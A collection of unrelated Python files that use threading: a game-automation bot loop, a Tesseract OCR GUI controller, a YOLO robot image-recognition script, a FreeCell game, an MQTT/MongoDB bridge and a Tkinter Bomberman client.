[self.claim_quests_task, 'claimQuests', 'questDoRound'],
[self.claim_vip_task, 'enableVipClaimChest', 'vipDoRound'],
[self.collecting_task, 'enableCollecting'],
[self.gather_resource_task, 'gatherResource'],
[self.materials_task, 'enableMaterialProduce' , 'materialDoRound'],
[self.scout_task, 'enableScout'],
[self.tavern_task, 'enableTavern'],
[self.training, 'enableTraining'],
[self.sunset_canyon, 'enableSunsetCanyon'],
[self.lost_canyon, 'enableLostCanyon'],
[self.items_task, 'useItems']
]
if self.building_pos is None:
curr_task = TaskName.INIT_BUILDING_POS
else:
self.config.hasBuildingPos = True
while True:
# Check verification before every task
try:
self.task.get_curr_gui_name()
except Exception as e:
traceback.print_exc()
self.task.set_text(insert='cannot pass verification - stopping bot now')
self.stop()
random.shuffle(tasks)
# restart
if curr_task == TaskName.KILL_GAME and self.config.enableStop \
and self.round_count % self.config.stopDoRound == 0:
curr_task = self.restart_task.do(TaskName.BREAK)
elif curr_task == TaskName.KILL_GAME:
curr_task = TaskName.BREAK
# init building position if need
if not self.config.hasBuildingPos or curr_task == TaskName.INIT_BUILDING_POS:
self.task.set_text(insert='building positions not saved - recalculating')
curr_task = self.locate_building_task.do(next_task=TaskName.COLLECTING)
elif curr_task == TaskName.BREAK and self.config.enableBreak \
and self.round_count % self.config.breakDoRound == 0:
curr_task = self.break_task.do(TaskName.COLLECTING)
elif curr_task == TaskName.BREAK:
curr_task = self.break_task.do_no_wait(TaskName.KILL_GAME)
for task in tasks:
if len(task) == 2:
if getattr(self.config, task[1]):
curr_task = task[0].do()
else:
if getattr(self.config, task[1]) and self.round_count % getattr(self.config, task[2]) == 0:
curr_task = task[0].do()
if self.config.enableStop:
curr_task = TaskName.KILL_GAME
else:
curr_task = TaskName.BREAK
self.round_count = self.round_count + 1
return
def daemon(self, fn):
def run():
main_thread = threading.Thread(target=fn)
self.curr_thread = main_thread
main_thread.start()
while True:
if self.daemon_thread is None or not main_thread.is_alive():
break
time.sleep(60)
                found, _, pos = self.gui.check_any(ImagePathAndProps.VERIFICATION_VERIFY_TITLE_IMAGE_PATH.value)
if found:
found, _, pos = self.gui.check_any(ImagePathAndProps.VERIFICATION_CLOSE_REFRESH_OK_BUTTON_IMAGE_PATH.value)
if not found:
stop_thread(main_thread)
time.sleep(1)
main_thread = threading.Thread(target=fn)
self.curr_thread = main_thread
main_thread.start()
daemon_thread = threading.Thread(target=run)
daemon_thread.start()
self.daemon_thread = daemon_thread
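# Minimal usage sketch (illustrative only): Bot expects an adb device handle whose
# .shell() call returns command output as a string. pure-python-adb (ppadb) is assumed
# here purely for illustration, as are the adb host/port and the emulator serial.
if __name__ == '__main__':
    from ppadb.client import Client as AdbClient

    adb = AdbClient(host='127.0.0.1', port=5037)
    device = adb.device('emulator-5554')  # hypothetical device serial
    bot = Bot(device)
    bot.start(bot.do_task)  # run the task loop under the verification-watching daemon thread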
|
tesseract_controller.py
|
import threading
import time
from functools import partial
from logging import getLogger
from pathlib import Path
from kivymd.toast import toast
from kivymd.uix.button import MDFlatButton
from kivymd.uix.dialog import MDDialog
from kivymd.uix.filemanager import MDFileManager
from kivymd.uix.menu import MDDropdownMenu
from kivymd.uix.textfield import MDTextField
from tesseractXplore.app import alert, get_app
from tesseractXplore.controllers import Controller
from tesseractXplore.recognizer import recognize
from tesseractXplore.tessprofiles import write_tessprofiles
logger = getLogger().getChild(__name__)
class TesseractController(Controller):
""" Controller class to manage image selector screen """
def __init__(self, screen):
super().__init__(screen)
self.screen = screen
self.psms = [' 0 Orientation and script detection (OSD) only.',
' 1 Automatic page segmentation with OSD.',
' 2 Automatic page segmentation, but no OSD, or OCR. (not implemented)',
' 3 Fully automatic page segmentation, but no OSD. (Default)',
' 4 Assume a single column of text of variable sizes.',
' 5 Assume a single uniform block of vertically aligned text.',
' 6 Assume a single uniform block of text.', ' 7 Treat the image as a single text line.',
' 8 Treat the image as a single word.', ' 9 Treat the image as a single word in a circle.',
' 10 Treat the image as a single character.',
' 11 Sparse text. Find as much text as possible in no particular order.',
' 12 Sparse text with OSD.',
' 13 Raw line. Treat the image as a single text line, bypassing hacks that are Tesseract-specific.']
self.oems = [' 0 Legacy engine only.', ' 1 Neural nets LSTM engine only.',
' 2 Legacy + LSTM engines.', ' 3 Default, based on what is available.']
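        # For reference (not executed here): the PSM/OEM numbers above correspond to the
        # standard tesseract CLI flags, e.g. `tesseract input.png output --psm 3 --oem 1 -l eng`.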
self.init_dropdown()
self.tessprofile_menu = screen.tessprofile_menu
self.output_manager = MDFileManager(
exit_manager=self.exit_output_manager,
select_path=self.select_output,
ext=[""],
)
self.selected_output_folder = None
self.screen.recognize_button_fst.bind(on_release=self.recognize_thread)
self.screen.recognize_button_snd.bind(on_release=self.recognize_thread)
self.screen.pause_button_fst.bind(on_press=self.stop_rec)
self.screen.pause_button_snd.bind(on_press=self.stop_rec)
self.screen.model.bind(on_release=get_app().image_selection_controller.get_model)
        # self.modelinfos = get_modelinfos()
self.print_on_screen = False
self.ocr_event = None
self.ocr_stop = False
self.last_rec_time = time.time()
# Context menu
self.screen.context_menu.ids.recognize_ctx.bind(on_release=self.recognize_single_thread)
# Load default settings
self.load_default_settings()
def load_default_settings(self):
for profile, profileparam in get_app().tessprofiles.items():
if profileparam['default'] == True:
self.load_tessprofile(profileparam)
def stop_rec(self, instance):
""" Unschedule progress event and log total execution time """
if self.ocr_event:
self.ocr_stop = True
logger.info(f'Recognizer: Canceled!')
def init_dropdown(self):
screen = self.screen
# Init dropdownsettingsmenu
self.psm_menu = self.create_dropdown(screen.psm, [{"viewclass":"OneLineListItem", 'text': 'PSM: ' + psm, 'on_release': partial(self.set_psm, 'PSM: ' + psm)} for psm in self.psms])
self.oem_menu = self.create_dropdown(screen.oem, [{"viewclass":"OneLineListItem", 'text': 'OEM: ' + oem, 'on_release': partial(self.set_oem, 'OEM: ' + oem)} for oem in self.oems])
def disable_rec(self, instance, *args):
self.screen.recognize_button_fst.disabled = True
self.screen.recognize_button_snd.disabled = True
self.screen.pause_button_fst.disabled = False
self.screen.pause_button_snd.disabled = False
def enable_rec(self, instance, *args):
self.screen.recognize_button_fst.disabled = False
self.screen.recognize_button_snd.disabled = False
self.screen.pause_button_fst.disabled = True
self.screen.pause_button_snd.disabled = True
def recognize_thread(self, instance, *args, file_list=None, profile=None):
self.disable_rec(instance, *args)
self.ocr_event = threading.Thread(target=self.recognize, args=(instance, args),
kwargs={'file_list': file_list, 'profile': profile})
        self.ocr_event.daemon = True
self.ocr_event.start()
return self.ocr_event
def recognize_single_thread(self, instance, *args, file_list=None, profile=None):
self.disable_rec(instance, *args)
instance.parent.hide()
self.ocr_single_event = threading.Thread(target=self.recognize, args=(instance, args),
kwargs={'file_list': [instance.selected_image.original_source],'profile': profile})
        self.ocr_single_event.daemon = True
self.ocr_single_event.start()
return self.ocr_single_event
def recognize(self, instance, *args, file_list=None, profile=None):
""" Recognize image with tesseract """
if profile is None:
profile = {}
if file_list is None:
file_list = get_app().image_selection_controller.file_list
if not file_list:
alert(f'Select images to recognize')
self.enable_rec(instance)
return
if instance is not None and instance._ButtonBehavior__touch_time < self.last_rec_time:
self.enable_rec(instance)
return
logger.info(f'Main: Recognize {len(file_list)} images')
# metadata_settings = get_app().metadata
# TODO: Handle write errors (like file locked) and show dialog
# file_list = get_app().image_selection_controller
model = profile.get("model", "eng" if self.screen.model.current_item == '' else self.screen.model.current_item.split(": ")[1].strip())
psm = profile.get("psm", "3" if self.screen.psm.current_item == '' else self.screen.psm.current_item.split(": ")[1].strip().split(' ',1)[0])
oem = profile.get("oem", "3" if self.screen.oem.current_item == '' else self.screen.oem.current_item.split(": ")[1].strip().split(' ',1)[0])
outputformats = profile.get("outputformats", self.active_outputformats())
print_on_screen = profile.get("print_on_screen", self.screen.print_on_screen_chk.active)
groupfolder = profile.get("groupfolder", self.screen.groupfolder.text)
subfolder = profile.get("subfolder", self.screen.subfolder_chk.active)
proc_files, outputnames = recognize(file_list, model=model, psm=psm, oem=oem, tessdatadir=get_app().settings_controller.tesseract['tessdatadir'],
output_folder=self.selected_output_folder, outputformats=outputformats,
print_on_screen=print_on_screen, subfolder=subfolder, groupfolder=groupfolder)
toast(f'{proc_files} images recognized')
self.last_rec_time = time.time() + 2
get_app().image_selection_controller.file_chooser._update_files()
self.enable_rec(instance)
# Update image previews with new metadata
# previews = {img.metadata.image_path: img for img in get_app().image_selection_controller.image_previews.children}
# for metadata in all_metadata:
# previews[metadata.image_path].metadata = metadata
def active_outputformats(self):
return [outputformat for outputformat in ['txt', 'hocr', 'alto', 'pdf', 'tsv'] if
self.screen[outputformat].state == 'down']
def on_tesssettings_click(self, *args):
self.tessprofile_menu.show(*get_app().root_window.mouse_pos)
def search_tessprofile(self):
get_app().tessprofiles_controller.set_profiles()
get_app().switch_screen('tessprofiles')
def load_tessprofile(self, tessprofileparams):
self.screen.model.set_item(f"Model: {tessprofileparams.get('model', 'eng')}")
self.screen.psm.set_item(f"PSM: {self.psms[int(tessprofileparams['psm'])]}")
self.screen.oem.set_item(f"OEM: {self.oems[int(tessprofileparams['oem'])]}")
for outputformat in ['txt', 'hocr', 'alto', 'pdf', 'tsv']:
if outputformat in tessprofileparams['outputformat']:
self.screen[outputformat.strip()].state = 'down'
else:
self.screen[outputformat.strip()].state = 'normal'
self.screen.print_on_screen_chk.active = True if tessprofileparams['print_on_screen'] == "True" else False
if tessprofileparams['outputdir'] != "":
self.screen.output.set_item(f"Selected output directory: {tessprofileparams['outputdir']}")
else:
self.screen.output.text = ''
self.screen.output.set_item('')
self.screen.output.text = f"Select output directory (default: input folder)"
self.screen.subfolder_chk.active = True if tessprofileparams['subfolder'] == "True" else False
self.screen.groupfolder.text = tessprofileparams['groupfolder']
return
def save_tessprofile_dialog(self):
def close_dialog(instance, *args):
instance.parent.parent.parent.parent.dismiss()
dialog = MDDialog(title="Name of the profile",
type='custom',
auto_dismiss=False,
content_cls=MDTextField(text="",mode="rectangle"),
buttons=[
MDFlatButton(
text="SAVE", on_release=self.save_tessprofile
),
MDFlatButton(
text="DISCARD", on_release=close_dialog
),
],
)
if get_app()._platform not in ['win32', 'win64']:
# TODO: Focus function seems buggy in win
dialog.content_cls.focused = True
dialog.open()
def save_tessprofile(self, instance):
tessprofilename = instance.parent.parent.parent.parent.content_cls.text
if tessprofilename != '':
get_app().tessprofiles[tessprofilename] = {
"model": self.screen.model.current_item.split(" ")[1] if self.screen.model.current_item.split(" ")[
0] == "Model:" else "eng",
"psm": "".join([char for char in self.screen.psm.text if char.isdigit()]),
"oem": "".join([char for char in self.screen.oem.text if char.isdigit()]),
"outputformat": self.active_outputformats(),
"print_on_screen": str(self.screen.print_on_screen_chk.active),
"outputdir": "" if self.screen.output.text.split(" ")[0] != "Selected" else
self.screen.output.text.split(" ")[3],
"groupfolder": self.screen.groupfolder.text,
"subfolder": str(self.screen.subfolder_chk.active),
"default": False
}
write_tessprofiles(get_app().tessprofiles)
instance.parent.parent.parent.parent.dismiss()
def reset_settings(self):
# TODO: Rework resetting
self.reset_text(self.screen.model)
self.reset_text(self.screen.psm)
self.reset_text(self.screen.oem)
self.reset_ouputformat()
self.screen.print_on_screen_chk.active = False
self.selected_output_folder = None
self.screen.output.text = ''
self.screen.output.set_item('')
self.screen.output.text = f"Select output directory (default: input folder)"
self.screen.subfolder_chk.active = False
self.screen.groupfolder.text = ''
def reset_text(self, instance):
instance.text = instance.text + '!'
instance.set_item('')
instance.text = instance.text[:-1]
def reset_ouputformat(self):
self.screen.txt.state = 'normal'
self.screen.alto.state = 'normal'
self.screen.hocr.state = 'normal'
self.screen.pdf.state = 'normal'
self.screen.tsv.state = 'normal'
def create_dropdown(self, caller, item):
menu = MDDropdownMenu(caller=caller,
items=item,
position='bottom',
width_mult=20)
menu.bind()
return menu
def set_psm(self, text):
self.screen.psm.set_item(text)
self.psm_menu.dismiss()
def set_oem(self, text):
self.screen.oem.set_item(text)
self.oem_menu.dismiss()
def select_output(self, path=None):
'''It will be called when you click on the file name
or the catalog selection button.
:type path: str;
:param path: path to the selected directory or file;
'''
if path is None: return
self.selected_output_folder = path
self.screen.output.text = f"Selected output directory: {path}"
self.exit_output_manager()
def select_output_folder(self):
if get_app().image_selection_controller.file_list != []:
self.output_manager.show(str(Path(get_app().image_selection_controller.file_list[0]).parent.resolve()))
else:
self.output_manager.show("/")
def exit_output_manager(self, *args):
'''Called when the user reaches the root of the directory tree.'''
self.output_manager.close()
|
imgrec.py
|
import darknet
import cv2
import numpy as np
import imutils
import random
import time
#Setup sending of string and receiving of coordinate
import socket
import threading
PORT = 5051
FORMAT = 'utf-8'
SERVER = '192.168.32.32'
ADDR = (SERVER, PORT)
#robot_coord = 'empty'
ir_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ir_socket.connect(ADDR)
WEIGHT_FILE_PATH = 'yolov4tiny.weights'
CONFIG_FILE_PATH = './cfg/custom-yolov4-tiny-detector.cfg'
DATA_FILE_PATH = './cfg/coco.data'
RPI_IP = '192.168.32.32'
MJPEG_STREAM_URL = 'http://' + RPI_IP + '/html/cam_pic_new.php'
YOLO_BATCH_SIZE = 4
THRESH = 0.85 #may want to lower and do filtering for specific images later
def retrieve_img():
#captures a frame from mjpeg stream
#returns opencv image
cap = cv2.VideoCapture(MJPEG_STREAM_URL)
ret, frame = cap.read()
return frame
def image_detection(image, network, class_names, class_colors, thresh):
    # Darknet doesn't accept numpy images, so create a darknet image buffer
    # that is reused for each detection.
    # Modified from darknet_images.py: takes an image directly instead of a path.
width = darknet.network_width(network)
height = darknet.network_height(network)
darknet_image = darknet.make_image(width, height, 3)
image_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image_resized = cv2.resize(image_rgb, (width, height),
interpolation=cv2.INTER_LINEAR)
darknet.copy_image_from_bytes(darknet_image, image_resized.tobytes())
detections = darknet.detect_image(network, class_names, darknet_image, thresh=thresh)
darknet.free_image(darknet_image)
image = darknet.draw_boxes(detections, image_resized, class_colors)
return cv2.cvtColor(image, cv2.COLOR_BGR2RGB), detections
def show_all_images(frame_list):
for index, frame in enumerate(frame_list):
frame = imutils.resize(frame, width=400)
cv2.imshow('Image' + str(index), frame)
if cv2.waitKey() & 0xFF == ord('q'):
cv2.destroyAllWindows()
def leading_zero(int_string):
if int(int_string) < 10:
return '0' + int_string
else:
return int_string
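# Example of the Android result string built in continuous_detect() below
# ("NumberID" + id + x + y, each zero-padded to two digits):
#   id='7' at (x, y) = (3, 12)  ->  'NumberID070312'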
def test_detect():
frame = cv2.imread('C:\\Users\\CZ3004\\Downloads\\images\\multi_142.jpeg')
#frame = retrieve_img()
network, class_names, class_colors = darknet.load_network(
CONFIG_FILE_PATH,
DATA_FILE_PATH,
WEIGHT_FILE_PATH,
YOLO_BATCH_SIZE
)
image, detections = image_detection(frame, network, class_names, class_colors, THRESH)
print(detections)
cv2.imshow('Inference', image)
if cv2.waitKey() & 0xFF == ord('q'):
cv2.destroyAllWindows()
cv2.imwrite('./result.jpeg', image)
def continuous_detect():
#use dictionary to store results
#structure: dictionary, tuple of (id, confidence,(bbox))
#bbox: x,y,w,h
#global robot_coord
#local_robot_coord = 'empty'
#if robot_coord != 'empty':
# local_robot_coord = robot_coord
# robot_coord = 'empty'
#local_robot_coord = '(1,1)|N'
results = {}
images = {}
network, class_names, class_colors = darknet.load_network(
CONFIG_FILE_PATH,
DATA_FILE_PATH,
WEIGHT_FILE_PATH,
YOLO_BATCH_SIZE
)
try:
print('Image recognition started!')
while True:
#print('Robot coordinates: ' + local_robot_coord)
cv2.waitKey(50)
frame = retrieve_img()
image, detections = image_detection(frame, network, class_names, class_colors, THRESH)
#structure: in a list, (id, confidence, (bbox))
#[('9', '99.72', (377.555419921875, 147.49517822265625, 87.70740509033203, 173.86444091796875)), ('7', '99.95', (43.562461853027344, 134.47283935546875, 91.14225006103516, 181.6890411376953)), ('8', '99.96', (214.2314453125, 143.147216796875, 85.68460845947266, 166.68231201171875))]
#index: 0-id 1-confidence 2-bbox
#bbox: x,y,w,h
for i in detections:
id = i[0] #string
confidence = i[1] #string
bbox = i[2] #tuple
                print('ID detected: ' + id + ', confidence: ' + confidence)
if id in results:
print('ID has been detected before')
if float(confidence) > float(results[id][1]):
print('Confidence higher. Replacing existing image.')
del results[id] #remove existing result from dict
del images[id] #remove existing img from dict
results[id] = i #add new result to dict. DUPLICATE ID IN VALUE PAIR!
images[id] = image #add new result to dict
else:
print('Confidence lower. Keeping existing image.')
pass
else:
print('New ID. Saving to results and image dict.')
results[id] = i
images[id] = image
except KeyboardInterrupt:
print('End of image recognition.')
#generate string
img_rec_result_string = '{'
print("Detection results:")
for i in results:
            #here you would pull the actual coordinates and compute the result
            #coordinates should already have been loaded and be accessible through a variable
x_coordinate = random.randint(0,14)
y_coordinate = random.randint(0,19)
id_coordinate_str = '(' + i + ',' + str(x_coordinate) + ',' + str(y_coordinate) + '),'
img_rec_result_string += id_coordinate_str
# Android: NumberIDABXXYY
# ANDROID STRING
android_string ='NumberID'
android_id = leading_zero(i)
android_x = leading_zero(str(x_coordinate))
android_y = leading_zero(str(y_coordinate))
android_string += android_id + android_x + android_y
# send string to android
message = android_string.encode(FORMAT)
ir_socket.send(message)
print('Sent ' + android_string + ' to Android.')
time.sleep(0.1)
#finish send string to android
print('ID: ' + i + ', Coordinates: (' + str(x_coordinate) +',' + str(y_coordinate) + ')' + ', Confidence: ' + results[i][1])
if img_rec_result_string[-1] == ',':
img_rec_result_string = img_rec_result_string[:-1]
img_rec_result_string += '}'
print(img_rec_result_string)
android_string_all = 'ImageID' + img_rec_result_string
message = android_string_all.encode(FORMAT)
ir_socket.send(message)
print('Sent ' + android_string_all + ' to Android.')
#generate image mosaic
result_frame_list = list(images.values())
show_all_images(result_frame_list)
def readRPI():
while True:
msg = ir_socket.recv(1024)
if msg:
print('Received coordinates')
robot_coord = msg
if __name__ == "__main__":
#test_detect()
#read_rpi_thread = threading.Thread(target = readRPI, name = "read_rpi_thread")
#read_rpi_thread.daemon = True
#print('Starting RPi comm thread...')
#read_rpi_thread.start()
#print('RPi comm thread started.')
continuous_detect()
|
game.py
|
import Queue
import random
import threading
import time
import events
from events import *
from gui import FreeCellGUI
from logic import FreeCellLogic
from network import FreeCellNetworking
class FreeCellGame(object):
def __init__(self, seed=None, debug=False, networking=False):
"""
:param int seed: Seed
:param bool debug: Debug enabled
:param bool networking: Networking enabled
"""
self.event_dispatch = events.event_dispatch
self.logic = FreeCellLogic()
self.gui = FreeCellGUI(self.logic)
self.input = self.gui.get_input()
self.stats = None
self.seed = None
self.debug = debug
self.networking = None
self.shutdown_event = threading.Event()
self.quit_message = None
self.state = ""
self.threads = []
input_thread = threading.Thread(target=self.input.run)
input_thread.daemon = True
self.threads.append(input_thread)
if networking:
self.networking = FreeCellNetworking()
self.threads.append(threading.Thread(target=self.networking.run, args=(self.shutdown_event,)))
else:
event = SeedEvent(seed=seed or random.randint(0, 0xFFFFFFFF))
self.event_dispatch.send(event)
def start(self, stdscr):
if self.debug:
from pydevd import pydevd
from debug import DEBUG_HOST, DEBUG_PORT
pydevd.settrace(DEBUG_HOST, port=DEBUG_PORT, suspend=False)
if self.networking is not None:
self.event_dispatch.send(ScreenChangeEvent(screen="login"))
self.event_dispatch.register(self.finish, ["FinishEvent"])
self.event_dispatch.register(self.quit, ["QuitEvent"])
self.event_dispatch.register(self.set_seed, ["SeedEvent"])
self.event_dispatch.register(self.handle_input, ["InputEvent"])
for thread in self.threads:
thread.start()
self.shutdown_event.set()
self.logic.start()
self.input.start(stdscr)
self.gui.start(stdscr)
self.game_loop()
def set_seed(self, event):
self.state = "seeded"
self.seed = event.seed
self.logic.load_seed(self.seed)
self.event_dispatch.send(ScreenChangeEvent(screen="game"))
def handle_input(self, event):
if event.key == ord('?'):
width = 44
height = 12
y = 1
x = 0
import curses
win = curses.newwin(height, width, y, x)
self.gui.set_screen("help")
self.gui.screens[self.gui.screen].set_window(win)
elif event.key == ord('Q'):
self.event_dispatch.send(FinishEvent(won=False))
def game_loop(self):
MAX_FPS = 30
S_PER_FRAME = 1.0/MAX_FPS
while self.shutdown_event.is_set():
start = time.time()
try:
self.event_dispatch.update(.1)
# TODO: have GUI only render on changed screen
self.gui.render()
elapsed = time.time() - start
if elapsed < S_PER_FRAME:
time.sleep(S_PER_FRAME-elapsed)
except KeyboardInterrupt:
self.event_dispatch.send(FinishEvent(won=False), priority=1)
def finish(self, event):
if self.seed is not None:
self.stats = Stats(seed=self.seed, time=time.time()-self.logic.start_time, moves=self.logic.moves, undos=self.logic.undos, won=self.logic.is_solved())
self.event_dispatch.send(self.stats)
if self.stats.won:
message = "You won!"
else:
message = "Better luck next time."
else:
message = ""
self.event_dispatch.send(QuitEvent(message=message))
def quit(self, event):
self.quit_message = event.message
self.shutdown_event.clear()
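# Minimal launch sketch (illustrative only): `start` expects a curses standard screen,
# so curses.wrapper is a natural entry point; the seed value below is arbitrary.
#
#   import curses
#   game = FreeCellGame(seed=12345, debug=False, networking=False)
#   curses.wrapper(game.start)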
|
main.py
|
import queue
from libs.mongo import Mongo
from libs.mqtt import MQTT
from libs.configuration import Configuration
from queue import Queue
from signal import pause
import threading
if __name__ == "__main__":
configuration = Configuration()
__queue = Queue()
mongo = Mongo(
mongoConfig = configuration.AppConfiguration["MONGODB"],
queue = __queue)
mqtt = MQTT(
mqttConfig = configuration.AppConfiguration["MQTT"],
queue = __queue)
mongo.connect()
mqtt.run()
th = []
th.append(threading.Thread( target = mongo.run, ))
th.append(threading.Thread( target = mqtt.run, ))
for t in th:
t.daemon = True
t.start()
try:
pause()
except KeyboardInterrupt:
pass
mqtt.stop()
mongo.disconnect()
|
teste.py
|
# -*- coding: utf-8 -*-
import Tkinter as tk
from Tkinter import *
from PIL import Image, ImageTk
import threading
import os
from threading import Thread
import time
from random import randint
class Bomberman(Frame):
def __init__(self, parent,numeros, con, nick):
Frame.__init__(self, parent)
self.fogo=[]
numeros = numeros.split("/")
self.cli=con
self.sou=0
self.nick=nick
rows=15
columns=15
self.blocosespecial = []
#Frame.__init__(self,parent)
cont=1
self.blocos=[]
self._widgets = []
for row in range(rows):
current_row = []
for column in range(columns):
label = Label(self)
if row == 0 or row == 14:
label.configure(bg="gray")
label.grid(row=row, column=column, sticky="nsew")
elif column == 0 or column == 14:
label.configure(bg="gray")
label.grid(row=row, column=column, sticky="nsew")
else:
if row % 2 == 0 and column % 2 == 0:
label.configure(bg="gray")
label.grid(row=row, column=column, sticky="nsew")
else:
true = int(numeros[cont])
if row == 1 and column == 1:
true = 1
if row == 2 and column == 1:
true = 1
if row == 1 and column == 2:
true = 1
if row == 13 and column == 13:
true = 1
if row == 12 and column == 13:
true = 1
if row == 13 and column == 12:
true = 1
if true == 0:
self.blocos.append((column,row))
label.configure(bg="blue")
label.grid(row=row, column=column, sticky="nsew")
elif true == 9:
self.blocos.append((column,row))
self.blocosespecial.append((column,row))
label.configure(bg="blue")
label.grid(row=row, column=column, sticky="nsew")
else:
label.configure(bg="green")
label.grid(row=row, column=column, sticky="nsew")
cont+=1
current_row.append(label)
self._widgets.append(current_row)
for column in range(columns):
self.grid_columnconfigure(column, pad=28)
for row in range(rows):
self.grid_rowconfigure(row, pad=14)
self.pack(fill=BOTH, expand=1)
parent.protocol("WM_DELETE_WINDOW", self.close)
self.conexao()
self.tela(parent)
Thread(target=self.conexao2).start()
def tela(self,parent):
#self.img2 = ImageTk.PhotoImage(Image.open('tartaruga.png'))
#self.img = Label(self, image=self.img2)
#self.img.image=self.img2
#self.img.place(x=32,y=32)
#parent.bind("<Down>",self.baixo)
#parent.bind("<Up>",self.cima)
#parent.bind("<Left>",self.esquerda)
#parent.bind("<Right>",self.direita)
#parent.bind("<space>",self.bomba)
self.play1 = player(self,parent, self.sou)
self.play2 = player(self,parent, self.sou,self.play1)
def conexao(self):
self.cli.enviar("quemjoga")
teste = self.cli.receber()
self.sou = teste
#texto = "Você joga por "+teste
#toplevel = Toplevel()
#label1 = Label(toplevel, text=texto, height=5, width=30)
#label1.pack(side="top")
def conexao2(self):
testeeeeee=[]
while 1:
resposta = self.cli.receber()
columns=2
if resposta[:4] == "nick":
ranking=resposta.split("\n")
ranking2=[]
for i in range(len(ranking)-1):
if i != 0:
ranking2.append("tempo="+ranking[i].split(";")[1].split("=")[1]+";nick="+ranking[i].split(";")[0].split("=")[1])
else:
ranking2.append(ranking[0])
ranking2.sort()
toplevel = Toplevel(bg="black")
toplevel.title("Ranking")
widgets=[]
for row in range(len(ranking)-1):
current_row = []
numteste=1
vasf=0
for column in range(columns):
if row == 0 and vasf == 0:
numteste=0
if row == 0 and vasf == 1:
numteste=1
label = Label(toplevel,borderwidth=2,width=20,text=ranking2[row].split(";")[numteste].split("=")[1])
label.configure(bg="gray")
label.grid(row=row, column=column, sticky="nsew",padx=1, pady=1)
vasf=1
numteste-=1
current_row.append(label)
widgets.append(current_row)
self.play1.img.destroy()
self.play2.img.destroy()
elif len(resposta) > 3:
testeeeeee.append(resposta)
for x in testeeeeee:
for i in range(0,len(x),3):
texto=x[i:i+3]
resposta2=texto
if resposta2 == "000": #000
self.play2.baixo("baixo")
elif resposta2 == "001": #001
self.play2.cima("cima")
elif resposta2 == "010": #010
self.play2.esquerda("esquerda")
elif resposta2 == "011":#011
self.play2.direita("direita")
elif resposta2 == "100":#100
self.play2.bomba("bomba")
testeeeeee.remove(x)
else:
if resposta == "000": #000
self.play2.baixo("baixo")
elif resposta == "001": #001
self.play2.cima("cima")
elif resposta == "010": #010
self.play2.esquerda("esquerda")
elif resposta == "011":#011
self.play2.direita("direita")
elif resposta == "100":#100
self.play2.bomba("bomba")
def close(self):
os._exit(0)
class player():
def __init__(self,teste,parent,play,check=None):
self.testabomba=1
self.master = teste
self.outro = check
self.play = play
if play == "primeiro":
if check == None:
self.img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play13.gif'))
self.img = Label(self.master, bg="green",image=self.img2)
self.img.image=self.img2
self.img.place(x=32,y=32)
self.master.update()
self.lastx=self.img.winfo_x()
self.lasty=self.img.winfo_y()
else:
self.img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play23.gif'))
self.img = Label(self.master, bg="green",image=self.img2)
self.img.image=self.img2
self.img.place(x=416,y=416)
self.master.update()
self.lastx=self.img.winfo_x()
self.lasty=self.img.winfo_y()
else:
if check == None:
self.img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play23.gif'))
self.img = Label(self.master, bg="green",image=self.img2)
self.img.image=self.img2
self.img.place(x=416,y=416)
self.master.update()
self.lastx=self.img.winfo_x()
self.lasty=self.img.winfo_y()
else:
self.img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play13.gif'))
self.img = Label(self.master, bg="green", image=self.img2)
self.img.image=self.img2
self.img.place(x=32,y=32)
self.master.update()
self.lastx=self.img.winfo_x()
self.lasty=self.img.winfo_y()
if check == None:
parent.bind("<Down>",self.baixo)
parent.bind("<Up>",self.cima)
parent.bind("<Left>",self.esquerda)
parent.bind("<Right>",self.direita)
parent.bind("<space>",self.bomba)
self.inicio = int(time.strftime("%s"))
def baixo(self,event):
testando = self.checaposicao(self.img.winfo_x(),self.img.winfo_y()+32,"x")
if testando == True:
if event != "baixo":
self.master.cli.enviar("000")
self.lastx=self.img.winfo_x()
self.lasty=self.img.winfo_y()+32
if self.play == "primeiro":
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play13.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play23.gif'))
else:
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play23.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play13.gif'))
self.img.configure(image=img2)
self.img.image = img2
self.img.place(x=self.img.winfo_x(),y=self.img.winfo_y()+32)
elif testando == "morreu1" or testando == "morreu2":
if event != "baixo":
self.master.cli.enviar("000")
self.lastx=self.img.winfo_x()
self.lasty=self.img.winfo_y()+32
if self.play == "primeiro":
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play13.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play23.gif'))
else:
if self.outro == None:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play23.gif'))
else:
img2 = ImageTk.PhotoImage(Image.open('/usr/bin/play13.gif'))
self.img.configure(image=img2)
self.img.image = img2
self.img.place(x=self.img.winfo_x(),y=self.img.winfo_y()+32)
t1 = threading.Thread(target=self.morreu, args=[testando])
t1.start()
self.master.update()
def morreu(self,teste):
self.fim = int(time.strftime("%s"))
if teste == "morreu1" and self.master.sou == "primeiro":
texto = "Você Perdeu"
toplevel = Toplevel()
label1 = Label(toplevel, text=texto, height=5, width=30)
label1.pack(side="top")
time.sleep(5)
self.master.cli.enviar("acabou")
toplevel.destroy()
#self.master.close()
elif teste == "morreu1" and self.master.sou == "segundo":
score=self.fim-self.inicio
score=self.transform(score)
self.master.cli.enviar("nick="+self.master.nick+";tempo="+score)
texto = "Você Ganhou"
toplevel = Toplevel()
label1 = Label(toplevel, text=texto, height=5, width=30)
label1.pack(side="top")
time.sleep(5)
toplevel.destroy()
elif teste == "morreu2" and self.master.sou == "segundo":
texto = "Você Perdeu"
toplevel = Toplevel()
label1 = Label(toplevel, text=texto, height=5, width=30)
label1.pack(side="top")
time.sleep(5)
self.master.cli.enviar("acabou")
toplevel.destroy()
else:
score=self.fim-self.inicio
score=self.transform(score)
self.master.cli.enviar("nick="+self.master.nick+";tempo="+score)
texto = "Você Ganhou"
toplevel = Toplevel()
label1 = Label(toplevel, text=texto, height=5, width=30)
label1.pack(side="top")
time.sleep(5)
toplevel.destroy()
